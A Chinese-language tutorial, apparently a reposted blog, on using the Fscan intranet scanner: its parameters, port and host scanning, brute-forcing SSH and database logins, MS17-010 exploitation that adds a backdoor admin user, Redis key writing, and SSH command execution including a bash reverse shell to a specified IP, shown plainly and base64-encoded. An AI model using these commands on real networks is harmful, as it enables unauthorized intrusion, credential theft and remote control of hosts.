内网扫描器Fscan

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
RDS MySQL Serverless 高可用系列,价值2615元额度,1个月
简介: 内网扫描器Fscan

简介

  • 一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
  • 支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
下载地址:https://github.com/shadow1ng/fscan

主要功能

1.信息搜集

存活探测(icmp)

端口扫描

2.爆破功能:

各类服务爆破(ssh、smb、rdp等)

数据库密码爆破(mysql、mssql、redis、psql、oracle等)

3.系统信息、漏洞扫描

netbios探测、域控识别

获取目标网卡信息

高危漏洞扫描(ms17010等)

4.Web探测功能:

webtitle探测

web指纹识别(常见cms、oa框架等)

web漏洞扫描(weblogic、st2等,支持xray的poc)

5.漏洞利用:

redis写公钥或写计划任务

ssh命令执行

ms17017利用(植入shellcode),如添加用户等

6.其他功能:

文件保存

使用方法

完整参数

-c string      #ssh命令执行  
-cookie string  #设置cookie  
-debug int     #多久没响应,就打印当前进度(default 60)  
-domain string    #smb爆破模块时,设置域名  
-h string          #目标ip: 192.168.11.11 | 192.168.11.11-255 |192.168.11.11,192.168.11.12  
-hf string        #读取文件中的目标  
-hn string        #扫描时,要跳过的ip: -hn 192.168.1.1/24  -m string         #设置扫描模式: 
-m ssh (default "all")  
-no            #扫描结果不保存到文件中  
-nobr            #跳过sql、ftp、ssh等的密码爆破  
-nopoc          #跳过web poc扫描  
-np            #跳过存活探测  
-num int         #web poc 发包速率  (default 20)  
-o string          #扫描结果保存到哪 (default "result.txt") 
-p string          #设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")  
-pa string        #新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)  
-path string      #fcgi、smb romote file path  
-ping            #使用ping代替icmp进行存活探测  
-pn string        #扫描时要跳过的端口,as: -pn 445  
-pocname string   #指定web poc的模糊名字, -pocname weblogic 
-proxy string     #设置代理, -proxy http://127.0.0.1:8080  
-user string      #指定爆破时的用户名  
-userf string     #指定爆破时的用户名文件  
-pwd string       #指定爆破时的密码  
-pwdf string      # 指定爆破时的密码文件  
-rf string        #指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)  
-rs string         #redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)  
-silent          #静默扫描,适合cs扫描时不回显  
-sshkey string    #ssh连接时,指定ssh私钥  
-t int          #扫描线程 (default 600)  
-time int          #端口扫描超时时间 (default 3)  
-u string          #指定Url扫描  
-uf string        #指定Url文件扫描  
-wt int          #web访问超时时间 (default 5)  
-pocpath string  #指定poc路径  
-usera string   #在原有用户字典基础上,新增新用户  
-pwda string    #在原有密码字典基础上,增加新密码  
-socks5       #指定socks5代理 (as: -socks5  socks5://127.0.0.1:1080)  
-sc         #指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add)

简单使用

fscan.exe -h [IP] #默认使用全部模块fscan.exe -h 192.168.1.1/16 #扫描B段fscan.exe -h 192.168.x.x -h 192.168.1.1/24 //C段fscan.exe -h 192.168.x.x -h 192.168.1.1/16 //B段fscan.exe -h 192.168.x.x -h 192.168.1.1/8  //A段的192.x.x.1和192.x.x.254,方便快速查看网段信息

image.png

加上netbios模块才会显示netbios的信息

.\fscan64.exe -h 192.168.88.141 -m netbios

以文件进行导入扫描

1. .\fscan64.exe -hf “路径”
2. .\fscan64.exe -hf .\ip.txt
3. \#可以使用相对位置,也可以使用绝对位置

跳过相应IP进行扫描

.\fscan64.exe -h 192.168.88.1/24

对url进行扫描

1. .\fscan64.exe -u http://baidu.com
2. # -uf 对指定文件内的URL进行扫描

设置代理扫描

.\fscan64.exe -h 192.168.88.1/24  -proxy http://127.0.0.1:8080

爆破功能

爆破使用

爆破功能简单使用的话直接使用即可默认调用,输入如下命令它会自动爆破扫描出来的服务

.\fscan64.exe -h IP

对模块进行自定义文件爆破

.\fscan64.exe -h [IP] -m [模块] -p [模块对应的端口] -pwdf [密码文件] -userf [用户名文件]

-m的模块包含:

[mssql] [ms17010] [all] [portscan] [ftp] [smb] [netbios] [oracle] [redis]

[fcgi] [mem] [web] [ssh] [findnet] [icmp] [main] [rdp] [mgo] [cve20200796]

[webonly] [mysql] [psql]

对ssh模块进行爆破,并设置自定义文件爆破:

.\fscan64.exe -h IP -m ssh -p 22 -pwdf .\pwd.txt -userf .\users.txt

 

-pwdf 、-userf 同样也是相对位置和绝对位置都可以使用。

注:在进行爆破的时候是按文件里面的顺序进行爆破的,这时ssh包含多个用户,只能爆破出来第一个,要把root类的管理权限高的用户名放在文本得最上面。

附加一个扫mysql服务的:

.\fscan64.exe -h IP -m mysql -np -nopoc

20c75aab2a96d48ef7a63eea35e153d9_3c9c9fe95479442bb7de12c67ef479b1.png

使用navicat连接

连接的前提:你目标机要开启远程连接

mysql开启远程连接:

grant all privileges on *.* to 'root'@'%' identified by '123456' with grant option;   #开启一个远程连接用户为root任意IP可以连接,密码时123456
flush privileges; #刷新用户权限
select user,host from user;   #查看用户检查是否已经更改

跳过一些扫描进行爆破

1. -nobr    #跳过sql、ftp、ssh等爆破
2. -nopoc     #跳过web poc扫描
3. -np    #跳过存活检测

利用功能

使用ssh命令执行

.\fscan64.exe -h [目标IP] -c [执行的命令]

例如:

查看用户:

.\fscan64.exe -h IP -c whoami

ssh命令执行上线Necat

例如:

执行的命令:

bash -i >& /dev/tcp/192.168.0.120/5555 0>&1

编码后执行的命令(因为在powershell中执行的命令不能包含&&和&):

.\fscan64.exe -h 192.168.88.130  -c "bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTIwLzU1NTUgMD4mMQo=}|{base64,-d}|{bash,-i}'"

注:若命令有变只需要将变化后执行的命令进行base64编码后,对上述编码后执行的命令中的base64编码进行替换即可。

MS17-010模块利用

添加用户:

.\fscan64.exe -h 192.168.88.141 -m ms17010 -sc add

执行此命令后会生成一个用户,用户名:sysadmin 密码:1qaz@WSX!@#4

启用guest用户,并把guest用户添加到管理员组

1. .\fscan64.exe -h 192.168.88.141 -m ms17010 -sc guest
2. #启用后用户是guest 密码:1qaz@WSX!@#4

原文链接:https://blog.csdn.net/Yhl_Z/article/details/133279602

相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助     相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
相关文章
|
1月前
|
域名解析 存储 缓存
DNS是什么?内网电脑需要配置吗?
【10月更文挑战第22天】DNS是什么?内网电脑需要配置吗?
127 1
|
2月前
|
监控 安全 网络协议
如何防止内网攻击?
如何防止内网攻击?【10月更文挑战第10天】
59 2
|
7月前
|
监控 网络协议 安全
【亮剑】当设备IP能ping通但无法上网时,可能是DNS解析、网关/路由设置、防火墙限制、网络配置错误或ISP问题
【4月更文挑战第30天】当设备IP能ping通但无法上网时,可能是DNS解析、网关/路由设置、防火墙限制、网络配置错误或ISP问题。解决步骤包括检查网络配置、DNS设置、网关路由、防火墙规则,以及联系ISP。预防措施包括定期备份配置、更新固件、监控网络性能和实施网络安全策略。通过排查和维护,可确保网络稳定和安全。
1261 1
|
JavaScript 前端开发 Go
通过 WebVPN 扫描内网
通过 WebVPN 扫描内网
通过 WebVPN 扫描内网
|
存储 安全 数据库
内网协议分析攻击类型
内网协议分析攻击类型
106 0
|
安全 网络协议 NoSQL
对内网服务端口进行扫描
对内网服务端口进行扫描,根据开放的端口服务选择横向的方法。
338 1
内网安全-内网漫游Socks代理隧道技术
内网安全-内网漫游Socks代理隧道技术
|
网络协议 Shell 网络安全
防火墙命令补充和dmz_远程管理
防火墙命令补充和dmz_远程管理
|
网络安全
Freeswitch在内网,由服务器防火墙映射出来,IMSDROID作为被叫的问题
Freeswitch在内网,由服务器防火墙映射出来,IMSDROID作为被叫的问题
135 0
|
网络协议 Windows
同时使用有线网上内网、无线网上外网
方法一、 利用有线访问局域网数据库等,用无线网络访问外网,这里提供一种方法可以实现,可编写bat文件,并在cmd中执行: route delete 0.0.0.0 route add 0.0.0.0 mask 0.0.0.0 172.20.1.254 route add 172.20.36.0 mask 255.255.255.0 172.20.36.254 解释一下: 其中172.20.1.254为无线网网关,172.20.36.254为有线网网关。
3760 0